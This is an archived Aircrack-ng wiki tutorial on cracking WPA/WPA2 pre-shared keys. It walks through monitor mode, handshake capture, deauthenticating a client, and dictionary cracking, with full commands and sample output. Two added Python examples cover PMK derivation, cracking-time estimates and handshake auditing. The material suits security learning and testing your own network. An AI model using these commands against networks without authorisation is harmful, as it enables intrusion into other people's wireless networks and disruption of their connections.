15.02.12 cracking_wpa [Aircrack-ng]
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Tutorial: How to Crack WPA/WPA2

Version: 1.20 March 07, 2010

Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2 [http://www.hsc.fr/ressources/articles/hakin9_wifi/hakin9_wifi_EN.pdf]. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs like when cracking WEP encryption does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary.
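To make the cost argument above concrete, here is an added example of mine (not part of the aircrack-ng tutorial) that derives the pairwise master key exactly as WPA/WPA2-Personal does, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations, and turns the tutorial's 50 to 300 keys/s figure into worst-case times for a wordlist versus a 63-character random passphrase. The PBKDF2 parameters are the 802.11i standard ones; the wordlist, the sizes and the rate are constructed inputs, and the "password"/"IEEE" pair is the published 802.11i test vector.

```python
"""Why WPA/WPA2-PSK cracking is slow, and what a passphrase policy buys you.

Added example for this page; it is not part of the aircrack-ng tutorial.
The per-second rate below is the tutorial's own figure (50 to 300 keys/s);
everything else is standard 802.11i key derivation.
"""
import hashlib


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key for a WPA/WPA2 personal network.

    PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    aircrack-ng prints this value as "Master Key" once it finds the key.
    A dictionary attack has to redo this for every candidate passphrase,
    and the 4096 HMAC rounds are what make each candidate expensive.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Worst-case time to try every candidate at a given test rate."""
    return candidates / keys_per_second


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of exactly `length` characters from an alphabet."""
    return alphabet_size ** length


def passphrase_in_wordlist(passphrase: str, wordlist) -> bool:
    """The attack in this tutorial only succeeds if the passphrase is in the
    dictionary file, so a defender's first check is exactly that."""
    return passphrase in set(w.strip() for w in wordlist)


if __name__ == "__main__":
    # IEEE 802.11i test vector; the wordlist is a constructed sample.
    pmk = derive_pmk("password", "IEEE")
    print("PMK:", pmk.hex())
    words = ["letmein", "password", "12345678"]
    print("in wordlist:", passphrase_in_wordlist("password", words))
    for n, label in [(len(words), "this tiny list"),
                     (10_000_000, "a 10M-word list"),
                     (keyspace(95, 63), "63 random printable characters")]:
        secs = seconds_to_exhaust(n, 300)
        print(f"{label}: {secs:.3g} s at 300 keys/s ({secs / 86400:.3g} days)")
```

For a defender the interesting output is the last three lines: at 300 keys/s a ten-million-word list takes about nine hours, 63 random printable characters are out of reach by more than a hundred orders of magnitude, and a passphrase that appears in any common wordlist fails the check regardless of its length.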

IMPORTANT: This means that the passphrase must be contained in the dictionary file you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions

First, this solution assumes:

  * You are using drivers patched for injection. Use the injection test to confirm your card can inject prior to proceeding.
  * You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you will be able to transmit packets to them. The wireless card strength is typically less than the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
  * You are using v0.9.1 or above of aircrack-ng. Different versions of aircrack-ng may use different commands or command syntax.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work.

In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.

Equipment used

In this tutorial, here is what was used:

  * MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
  * MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
  * BSSID (MAC address of access point): 00:14:6C:7E:40:80
  * ESSID (Wireless network name): teddy
  * Access point channel: 9
  * Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

Solution

Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. Actively means you will accelerate the process by deauthenticating an existing wireless client. Passively means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:

  1. Start the wireless interface in monitor mode on the specific AP channel
  2. Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
  3. Use aireplay-ng to deauthenticate the wireless client
  4. Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 - Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only "hear" packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:

  airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

  Interface       Chipset         Driver

  rausb0          Ralink RT73     rt73
  wlan0           Broadcom        b43 - [phy0]
  wifi0           Atheros         madwifi-ng
  ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show madwifi-ng as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.

Step 1a - Setting up madwifi-ng

First stop ath0 by entering:

  airmon-ng stop ath0

The system responds:

  Interface       Chipset         Driver

  wifi0           Atheros         madwifi-ng
  ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

  lo        no wireless extensions.

  eth0      no wireless extensions.

  wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

  airmon-ng start wifi0 9

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used.

The system will respond:

  Interface       Chipset         Driver

  wifi0           Atheros         madwifi-ng
  ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly set up, enter iwconfig.

The system will respond:

  lo        no wireless extensions.

  wifi0     no wireless extensions.

  eth0      no wireless extensions.

  ath0      IEEE 802.11g  ESSID:""  Nickname:""
            Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
            Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3
            Retry:off   RTS thr:off   Fragment thr:off
            Encryption key:off
            Power Management:off
            Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
            Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9, and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132. This will give you the frequency for each channel.

Step 1b - Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

  airmon-ng start wlan0 9

The system responds:

  Interface       Chipset         Driver

  wlan0           Broadcom        b43 - [phy0]
                                  (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run iwconfig. The following output should appear:

  lo        no wireless extensions.

  eth0      no wireless extensions.

  wmaster0  no wireless extensions.

  wlan0     IEEE 802.11bg  ESSID:""
            Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
            Tx-Power=0 dBm
            Retry min limit:7   RTS thr:off   Fragment thr=2352 B
            Encryption key:off
            Power Management:off
            Link Quality:0  Signal level:0  Noise level:0
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
            Tx excessive retries:0  Invalid misc:0   Missed beacon:0

  mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
            Retry min limit:7   RTS thr:off   Fragment thr=2352 B
            Encryption key:off
            Power Management:off
            Link Quality:0  Signal level:0  Noise level:0
            Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
            Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes the channel on the other one.

Step 1c - Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

  airmon-ng start rausb0 9

The system responds:

  Interface       Chipset         Driver

  rausb0          Ralink RT73     rt73 (monitor mode enabled)

At this point, the interface should be ready to use.

Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

  airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

  * -c 9 is the channel for the wireless network

  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  * -w psk is the file name prefix for the file which will contain the IVs.
  * ath0 is the interface name.

Important: Do NOT use the --ivs option. You must capture the full packets.

Here is what it looks like if a wireless client is connected to the network:

  CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy

  BSSID              STATION            PWR  Lost  Packets  Probes

  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

In the screen above, notice the "WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy

  BSSID              STATION            PWR  Lost  Packets  Probes

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for "WPA handshake: 00:14:6C:7E:40:80" in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot. Use Wireshark and apply a filter of "eapol". This displays only the eapol packets you are interested in. Thus you can see if the capture contains 0, 1, 2, 3 or 4 eapol packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

  * -0 means deauthentication
  * 1 is the number of deauths to send (you can send multiple if you wish)
  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  * ath0 is the interface name

Here is what the output looks like:

  11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.

Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not "hear" the deauthentication packet.

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - "password.lst". This file can be found in the "test" directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper [http://www.openwall.com/john/] (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

  aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:

  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
  * *.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

  Opening psk-01.cap
  Opening psk-02.cap
  Opening psk-03.cap
  Opening psk-04.cap
  Read 1827 packets.

  No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

  Opening psk-01.cap
  Opening psk-02.cap
  Opening psk-03.cap
  Opening psk-04.cap
  Read 1827 packets.

  #  BSSID              ESSID                     Encryption

  1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

  Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

                                 Aircrack-ng 0.8

                   [00:00:00] 2 keys tested (37.20 k/s)

  KEY FOUND! [ 12345678 ]

  Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                   B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

  Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                   CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                   FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                   2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

  EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Troubleshooting Tips

I Cannot Capture the Four-way Handshake!

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

  * Your monitor card must be in the same mode as both the client and Access Point. So, for example, if your card was in "B" mode and the client/AP were using "G" mode, then you would not capture the handshake. This is especially important for new APs and clients which may be in "turbo" mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has an option "modulation" that can sometimes be used. Do "man iwconfig" to see the options for "modulation". For information, 1, 2, 5.5 and 11Mbit are 'b'; 6, 9, 12, 18, 24, 36, 48, 54Mbit are 'g'.
  * Sometimes you also need to set the monitor-mode card to the same speed. IE auto, 1MB, 2MB, 11MB, 54MB, etc.
  * Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying -c <channel of AP> when you start airodump-ng.
  * Be sure there are no connection managers running on your system. These can change channels and/or change mode without your knowledge.
  * You are physically close enough to receive both access point and wireless client packets. The wireless card strength is typically less than the AP strength.
  * Conversely, if you are too close then the received packets can be corrupted and discarded. So you cannot be too close.
  * Make sure to use the drivers specified on the wiki. Depending on the driver, some old versions do not capture all packets.
  * Ideally, connect and disconnect a wireless client normally to generate the handshake.
  * If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not "hear" the deauthentication packet.
  * Try stopping the radio on the client station then restarting it.
  * Make sure you are not running any other program/process that could interfere such as connection managers, Kismet, etc.
  * Review your captured data using the WPA Packet Capture Explained tutorial to see if you can identify the problem. Such as missing AP packets, missing client packets, etc.

Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake. The point is, if you don't get it the first time, have patience and experiment a bit. It can be done!

Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The WPA Packet Capture Explained tutorial is a companion to this tutorial and walks you through what a "normal" WPA connection looks like. As well, see the FAQ for detailed information on how to use Wireshark.

In an ideal world, you should use a wireless device dedicated to capturing the packets. This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets.

When using Wireshark, the filter "eapol" will quickly display only the EAPOL packets.
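Wireshark's "eapol" filter, here and in the Step 2 check, tells you how many EAPOL frames were captured; the following is an added example of mine, not from the aircrack-ng project, that goes one step further and classifies each EAPOL-Key frame as message 1, 2, 3 or 4 of the four-way handshake from its Key Information bits (Key Ack, Key MIC, Install, Secure), then reports whether the capture holds a complete handshake and, if not, which side's messages are missing. The RT73 "did not capture client packets" case above shows up as messages 2 and 4 missing. The frames are constructed with a builder that follows the 802.11i EAPOL-Key layout (descriptor type 2, empty key data); the nonces and replay counters are sample values.

```python
"""What "0, 1, 2, 3 or 4 eapol packets" in a capture actually means.

Added example for this page, not part of the aircrack-ng tutorial. It
classifies EAPOL-Key frames into the four handshake messages from their
Key Information bits, the fields Wireshark shows under the "eapol" filter,
and says which side's frames are missing. All frames are constructed.
"""
import struct

EAPOL_TYPE_KEY = 3
KEYINFO_PAIRWISE = 1 << 3
KEYINFO_INSTALL = 1 << 6
KEYINFO_ACK = 1 << 7
KEYINFO_MIC = 1 << 8
KEYINFO_SECURE = 1 << 9


def build_eapol_key(key_info: int, replay_counter: int, nonce: bytes) -> bytes:
    """Constructed EAPOL-Key frame: EAPOL header, RSN descriptor (type 2),
    key info, key length, replay counter, nonce, then zeroed IV/RSC/ID/MIC
    and an empty key-data field."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter)
    body += nonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0)
    return struct.pack(">BBH", 2, EAPOL_TYPE_KEY, len(body)) + body


def classify_eapol_key(frame: bytes):
    """Return ("M1".."M4", replay_counter), or None for anything else."""
    if len(frame) < 4 + 95 or frame[1] != EAPOL_TYPE_KEY:
        return None
    if frame[4] not in (2, 254):               # 2 = RSN (WPA2), 254 = legacy WPA
        return None
    key_info, _key_len, replay = struct.unpack_from(">HHQ", frame, 5)
    nonce = frame[17:49]
    if not key_info & KEYINFO_PAIRWISE:        # group-key handshake, not the 4-way
        return None
    ack, mic = bool(key_info & KEYINFO_ACK), bool(key_info & KEYINFO_MIC)
    install, secure = bool(key_info & KEYINFO_INSTALL), bool(key_info & KEYINFO_SECURE)
    if ack and not mic:
        return "M1", replay                    # AP -> client, carries ANonce
    if ack and mic and install:
        return "M3", replay                    # AP -> client, ANonce again, Install set
    if mic and not ack:
        # M2 and M4 both carry a MIC and no Ack. M4 sets Secure (WPA2) and,
        # in legacy WPA where Secure may be 0, carries an all-zero nonce.
        if secure or nonce == bytes(32):
            return "M4", replay
        return "M2", replay                    # client -> AP, carries SNonce
    return None


def audit_handshake(frames):
    """Summarise the EAPOL-Key frames of one capture."""
    seen = {}
    for f in frames:
        c = classify_eapol_key(f)
        if c and c[0] not in seen:
            seen[c[0]] = c[1]
    present = sorted(seen)
    missing = [m for m in ("M1", "M2", "M3", "M4") if m not in seen]
    if not present:
        verdict = "no EAPOL-Key frames captured"
    elif not missing:
        consistent = (seen["M2"] == seen["M1"] and
                      seen["M4"] == seen["M3"] == seen["M1"] + 1)
        verdict = ("complete four-way handshake" if consistent
                   else "four messages present but replay counters do not match one exchange")
    elif set(missing) >= {"M2", "M4"}:
        verdict = "missing client messages " + ", ".join(missing)
    elif set(missing) >= {"M1", "M3"}:
        verdict = "missing AP messages " + ", ".join(missing)
    else:
        verdict = "incomplete, missing " + ", ".join(missing)
    return {"present": present, "missing": missing, "verdict": verdict}


def sample_captures():
    """Constructed captures: a full exchange, an AP-only one (the RT73 case)
    and an empty one. Nonces and replay counters are sample values."""
    anonce, snonce = bytes([0x11]) * 32, bytes([0x22]) * 32
    pw = KEYINFO_PAIRWISE | 2                  # descriptor version 2 = HMAC-SHA1/AES
    m1 = build_eapol_key(pw | KEYINFO_ACK, 1, anonce)
    m2 = build_eapol_key(pw | KEYINFO_MIC, 1, snonce)
    m3 = build_eapol_key(pw | KEYINFO_ACK | KEYINFO_MIC | KEYINFO_INSTALL | KEYINFO_SECURE, 2, anonce)
    m4 = build_eapol_key(pw | KEYINFO_MIC | KEYINFO_SECURE, 2, bytes(32))
    return {"full": [m1, m2, m3, m4], "ap_only": [m1, m3], "empty": []}


if __name__ == "__main__":
    for name, frames in sample_captures().items():
        print(name, audit_handshake(frames))
```

To run this on a real capture, feed it the EAPOL payloads of the data frames (everything after the LLC/SNAP header, type 0x888E); the replay-counter check is what separates one genuine exchange from stray frames of two different association attempts.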

Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets.

To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs. Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture.

Every packet sent by client or AP must be acknowledged. This is done with an “acknowledgment” packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the “ack” packet. This confirms the client received the deauth packet. Failure to receive the “ack” packet likely means that the client is out of transmission range. Thus failure.

When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark.

aircrack-ng says "0 handshakes"

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.

aircrack-ng says "No valid WPA handshakes found"

Check the “I Cannot Capture the Four-way Handshake!” troubleshooting tip.

cracking_wpa.txt · Last modified: 2010/08/29 19:44 by mister_x
Except where otherwise noted, content on this wiki is licensed under the following license: CC Attribution-Noncommercial-Share Alike 3.0 Unported [http://creativecommons.org/licenses/by-nc-sa/3.0/]